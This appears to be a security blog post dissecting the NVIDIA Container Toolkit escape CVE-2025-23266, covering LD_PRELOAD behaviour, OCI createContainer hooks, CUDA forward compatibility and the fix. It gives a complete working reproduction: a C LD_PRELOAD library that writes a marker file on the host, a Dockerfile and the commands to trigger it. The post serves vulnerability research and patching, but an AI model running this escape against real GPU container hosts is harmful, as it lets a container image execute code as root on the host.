NVIDIA Container Escape CVE 2025-23266 (aka NVIDIAEscape)
First part of the series. How does the NVIDIA Container Toolkit work, and which mechanisms enable NVIDIAEscape?
Introduction
Wiz published on July 17, 2025 about a container escape on NVIDIA’s Container Runtime. The blog post explains in detail how an exploit would work, although it does not address a few runtime internals, more specifically how container hooks work under the hood.
This blog post explains:
- How to reproduce the issue by yourself
- Why this is an issue in the first place
- How the fix is implemented
Reproducing the issue
You can reproduce the issue yourself with the following steps (they are meant for Ubuntu, but are easily adaptable for other distributions):
Run this only in an isolated lab environment, never on production hosts.
Install and Configure NVIDIA Container Toolkit
- Download NVIDIA Container Toolkit version 1.17.7 or earlier. The one I used was
https://github.com/NVIDIA/nvidia-container-toolkit/releases/download/v1.17.7/nvidia-container-toolkit_1.17.7_deb_amd64.tar.gz - Unpack the .deb files to ~/release-v1.17.7-stable/packages/ubuntu18.04/amd64/
- Then, run the following commands in order (as
sudo):
1
2
3
4
dpkg -i libnvidia-container1_1.17.7-1_amd64.deb
dpkg -i libnvidia-container-tools_1.17.7-1_amd64.deb
dpkg -i nvidia-container-toolkit-base_1.17.7-1_amd64.deb
dpkg -i nvidia-container-toolkit_1.17.7-1_amd64.deb
- Configure the NVIDIA runtime by running:
1
sudo nvidia-ctk runtime configure --runtime=docker
- Then, restart Docker with:
1
sudo systemctl restart docker
Some of these steps are taken from here.
Create a shared library
The exploit requires a shared library to be loaded by the NVIDIA Container Runtime. The following code creates one that creates a /owned file on the host:
poc.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
// poc.c - minimal malicious LD_PRELOAD library (creates /owned)
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
// This function is called when the shared library is loaded
__attribute__((constructor))
void init(void) {
int fd = open("/owned", O_WRONLY | O_CREAT | O_TRUNC, 0644);
if (fd != -1) {
write(fd, "You have been owned!\n", 21);
close(fd);
}
}
Build it with:
1
gcc -fPIC -shared -o poc.so poc.c
We will explain later in detail how this code works.
Configure OCI hook for NVIDIA Container Runtime
The createContainer OCI hook only executes when the CUDA Forward Compatibility mode is set to “hook.”
Add or edit the /etc/nvidia-container-runtime/config.toml file so it contains the following:
1
2
[nvidia-container-runtime.modes.legacy]
cuda-compat-mode = "hook"
A detailed explanation about CUDA Forward Compatibility mode will follow later in this post.
Create a Docker image
This Docker image will contain the poc.so library that we created in the previous step. A vulnerable runtime will load this library and execute it at host level.
Dockerfile
1
2
3
FROM busybox
ENV LD_PRELOAD=./poc.so
ADD poc.so /
The Dockerfile and poc.so must be in the same folder.
Then build the image with:
1
docker build . -t nvidiascape-exploit
The command should create a new Docker image with a tag (-t) nvidiascape-exploit.
Then, run it with the following command:
1
docker run --rm --runtime=nvidia --gpus=all nvidiascape-exploit
If everything works correctly, you should see an /owned file at the root directory.
Understanding the issue
To properly understand how this exploit was crafted, we need to cover a few subjects first:
- Dynamic linker behavior
- Docker alternate runtimes
- CUDA Forward Compatibility
- OCI Runtime Specs and Hooks
Dynamic linker behavior
Whenever an application runs, it might require shared libraries — binaries that are not part of the application itself, but redistributed as part of another package. The dynamic linker’s job is to resolve these libraries during runtime.
The dynamic linker provides a feature where shared libraries set by the LD_PRELOAD environment variable take precedence over all others. As a debugging feature, this might sound useful, but it is risky for sensitive applications. The ld.so man page states:
1
2
3
4
5
6
Secure-execution mode
For security reasons, if the dynamic linker determines that a
binary should be run in secure-execution mode, the effects of some
environment variables are voided or modified, and furthermore
those environment variables are stripped from the environment, so
that the program does not even see the definitions.
As an experiment, try to run this on your terminal:
1
sudo LD_PRELOAD=/home/filiperodrigues/nvidiascape-exploit/poc.so find
You will end up with the same /owned file as in the original exploit.
The poc.so itself is rather simple: upon init, it creates a /owned file, then writes some content to it.
1
2
void init(void) {
int fd = open("/owned", O_WRONLY | O_CREAT | O_TRUNC, 0644);
The initializer is provided by the __attribute__((constructor)) function attributes.
Alternate runtimes
The default Docker runtime is runc. However, you can opt to use other runtimes that implement the containerd shim API. When you ran sudo nvidia-ctk runtime configure --runtime=docker earlier, you added an entry in /etc/docker/daemon.json, which should look like the following:
1
2
3
4
5
6
7
8
{
"runtimes": {
"nvidia": {
"args": [],
"path": "nvidia-container-runtime"
}
}
That tells Docker to use the nvidia-container-runtime application whenever you run a container with --runtime=nvidia.
CUDA Forward Compatibility
CUDA forward compatibility allows containers or applications that were built with a newer version of the CUDA toolkit (user-mode libraries) to run on systems where the host driver is slightly older as long as certain compatibility libraries are present. This is particularly useful for containerized workloads where:
- You might build and ship containers with newer CUDA versions than what the host has installed.
- Upgrading drivers on production systems isn’t always immediate or practical.
According to the documentation:
1
2
The CUDA forward compatibility package will then be installed to the versioned toolkit directory. For example,
for the CUDA forward compatibility package of 12.8, the GPU driver libraries of 570 will be installed in /usr/local/cuda-12.8/compat/.
It is important to notice that these libraries are installed on the host.
The NVIDIA Container Runtime implements forward compatibility as an OCI hook. If the "nvidia-container-runtime.modes.legacy.cuda-compat-mode" config option is set to "hook", enable-cuda-compat is used.
The hook will then execute and mount the compat libraries under “/usr/local/cuda/compat”. The mechanism used is called Container Device Interface.
OCI Runtime Specs and Hooks
We have mentioned OCI hooks a couple of times.
Whenever a container is created by Docker, it creates a JSON structure called an OCI runtime spec configuration. OCI stands for Open Container Initiative, the governing body responsible for container standards.
According to their page:
1
This configuration file contains metadata necessary to implement standard operations against the container. This includes the process to run, environment variables to inject, sandboxing features to use, etc.
For example, you can define an OCI runtime spec configuration like this:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
{
"ociVersion": "1.2.1",
"process": {
"user": {
"uid": 0,
"gid": 0,
"additionalGids": [0, 10]
},
"args": [
"sh"
],
"env": [
"FOO=bar"
]
}
That tells the container runtime (runc) to run a container with the binary sh as the application and the environment FOO with the value of bar.
These values that are part of this spec can come from different places. For the sake of this blog post, two places are important:
- The Dockerfile
- The NVIDIA Container Runtime
When Docker processes an ENV instruction in a Dockerfile, it adds those values to the process.env attribute in the spec.
If you have a Dockerfile like the one below:
1
2
ENV FOO=bar
RUN sh
You will end up with a spec like the one above.
The NVIDIA Container Runtime is a shim for runc. According to GitHub:
When a create command is detected, the incoming OCI runtime specification is modified in place and the command is forwarded to the low-level runtime.
The runc create command is executed whenever a new container is created. When that happens, the NVIDIA Container Runtime updates the spec to add a new hook.
Hooks are applications that can run in different stages of the container lifecycle, such as:
https://specs.opencontainers.org/runtime-spec/config/#posix-platform-hooks
- createRuntime
- createContainer
- startContainer
- postStart
- postStop
A container hook created by the NVIDIA Container Runtime looks like this:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
"createContainer": [
{
"path": "/usr/bin/nvidia-ctk",
"args": [
"nvidia-ctk",
"hook",
"enable-cuda-compat",
"--host-driver-version=575.64.03"
],
"env": [
]
},
{
"path": "/usr/bin/nvidia-ctk",
"args": [
"nvidia-ctk",
"hook",
"update-ldcache"
],
"env": [
]
}
Notice that you can specify environment variables for the hook itself.
The createContainer hook is special because although its path resolves on the host (or the “runtime namespace”, as the spec says), the hook itself executes within the “container namespace”.
The combination of all of these is what creates this issue:
- Docker adds the environment variable to the container spec
- NVIDIA Container Runtime adds the createContainer hook with no environment variables
- The
/usr/bin/nvidia-ctkruns, leaving its environment variables unspecified, which results in inheriting environment variables from its parent process
The explanation for why
/usr/bin/nvidia-ctkinherits parent process environment variables is in part 2 of this post.
Experimenting with nvidia-container-toolkit
If you want to understand how the NVIDIA Container Runtime is implemented, you can clone the following repository:
1
https://github.com/NVIDIA/nvidia-container-toolkit
This repository creates the nvidia-ctk and nvidia-container-runtime binaries, among others.
The function that creates a new runtime spec is newNVIDIAContainerRuntime, located in internal/runtime/runtime_factory.go.
The relevant parts are oci.NewSpec and newSpecModifier. These two functions:
- Create an OCI specification object (
ociSpec) from command-line args. The OCI spec describes how the container should be set up (namespaces, mounts, env vars, etc). - Create a spec modifier — a helper object that knows how to change the original OCI spec to inject NVIDIA-specific libraries, mounts, hooks, etc., needed for GPU containers.
You can see the actual spec by doing this:
- Add the following to the newNVIDIAContainerRuntime function
1
2
3
4
5
6
7
if logger != nil {
if specJSON, err := json.MarshalIndent(ociSpec, "", " "); err == nil {
logger.Infof("OCI Spec: %s", string(specJSON))
} else {
logger.Warningf("Failed to marshal OCI spec for logging: %v", err)
}
}
- Edit the runtime config (
/etc/nvidia-container-runtime/config.toml) to enable logs:
1
2
[nvidia-container-runtime]
debug = "/var/log/nvidia-container-runtime.log"
Then build it with:
1
make binaries
And copy the resulting file to /usr/bin/nvidia-container-runtime
After that, you should see the following output on the /var/log/nvidia-container-runtime.log file:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
{
"ociVersion": "1.2.1",
"process": {
"user": {
"uid": 0,
"gid": 0,
"additionalGids": [0, 10]
},
"args": [
"sh"
],
"env": [
"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
"HOSTNAME=e078abd14abe",
"LD_PRELOAD=./poc.so",
"NVIDIA_VISIBLE_DEVICES=all"
],
"cwd": "/",
"capabilities": {
"bounding": [
"CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_FSETID", "CAP_FOWNER", "CAP_MKNOD", "CAP_NET_RAW",
"CAP_SETGID", "CAP_SETUID", "CAP_SETFCAP", "CAP_SETPCAP", "CAP_NET_BIND_SERVICE",
"CAP_SYS_CHROOT", "CAP_KILL", "CAP_AUDIT_WRITE"
],
"effective": [
"CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_FSETID", "CAP_FOWNER", "CAP_MKNOD", "CAP_NET_RAW",
"CAP_SETGID", "CAP_SETUID", "CAP_SETFCAP", "CAP_SETPCAP", "CAP_NET_BIND_SERVICE",
"CAP_SYS_CHROOT", "CAP_KILL", "CAP_AUDIT_WRITE"
],
"permitted": [
"CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_FSETID", "CAP_FOWNER", "CAP_MKNOD", "CAP_NET_RAW",
"CAP_SETGID", "CAP_SETUID", "CAP_SETFCAP", "CAP_SETPCAP", "CAP_NET_BIND_SERVICE",
"CAP_SYS_CHROOT", "CAP_KILL", "CAP_AUDIT_WRITE"
]
},
"apparmorProfile": "docker-default",
"oomScoreAdj": 0
},
"root": {
"path": "/var/lib/docker/overlay2/b29b8b924bfcb60a5b2adadd98c935fe659480f24be017259f56cf49ead0d3ed/merged"
},
"hostname": "e078abd14abe",
"mounts": [
{
"destination": "/proc",
"type": "proc",
"source": "proc",
"options": ["nosuid", "noexec", "nodev"]
},
],
"hooks": {
"prestart": [
{
"path": "/usr/bin/nvidia-container-runtime-hook",
"args": [
"nvidia-container-runtime-hook",
"prestart"
],
"env": [
"LANG=en_US.UTF-8",
"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin",
"NOTIFY_SOCKET=/run/systemd/notify",
"INVOCATION_ID=6a71d6bbe6634f0baebf6075a9ece8b2",
"JOURNAL_STREAM=8:22608",
"SYSTEMD_EXEC_PID=2089",
"OTEL_SERVICE_NAME=dockerd",
"OTEL_EXPORTER_OTLP_TRACES_PROTOCOL=http/protobuf",
"OTEL_EXPORTER_OTLP_METRICS_PROTOCOL=http/protobuf",
"TMPDIR=/var/lib/docker/tmp"
]
}
]
},
//etc
You will notice that LD_PRELOAD is part of the container spec.
The fix
Before the fix, this is how createContainer would look:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
"createContainer": [
{
"path": "/usr/bin/nvidia-ctk",
"args": [
"nvidia-ctk",
"hook",
"enable-cuda-compat",
"--host-driver-version=575.64.03"
]
},
{
"path": "/usr/bin/nvidia-ctk",
"args": [
"nvidia-ctk",
"hook",
"update-ldcache"
]
}
And this is how it looks after:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
"createContainer": [
{
"path": "/usr/bin/nvidia-ctk",
"args": [
"nvidia-ctk",
"hook",
"enable-cuda-compat",
"--host-driver-version=575.64.03"
],
"env": [
"NVIDIA_CTK_DEBUG=false"
]
},
{
"path": "/usr/bin/nvidia-ctk",
"args": [
"nvidia-ctk",
"hook",
"update-ldcache"
],
"env": [
"NVIDIA_CTK_DEBUG=false"
]
}
With the fix, createContainer has an explicit env section, which was not present before. Since the issue was caused by inherited environment variables, this prevents attacker-controlled values like LD_PRELOAD from leaking into the hook process.
Final thoughts
This post should cover, in depth, what comes into play for this vulnerability to exist. The only part left out was this one:
While prestart hooks run in a clean, isolated context, createContainer hooks have a critical property: they inherit environment variables from the container image unless explicitly configured not to.
I have dedicated a second post for this here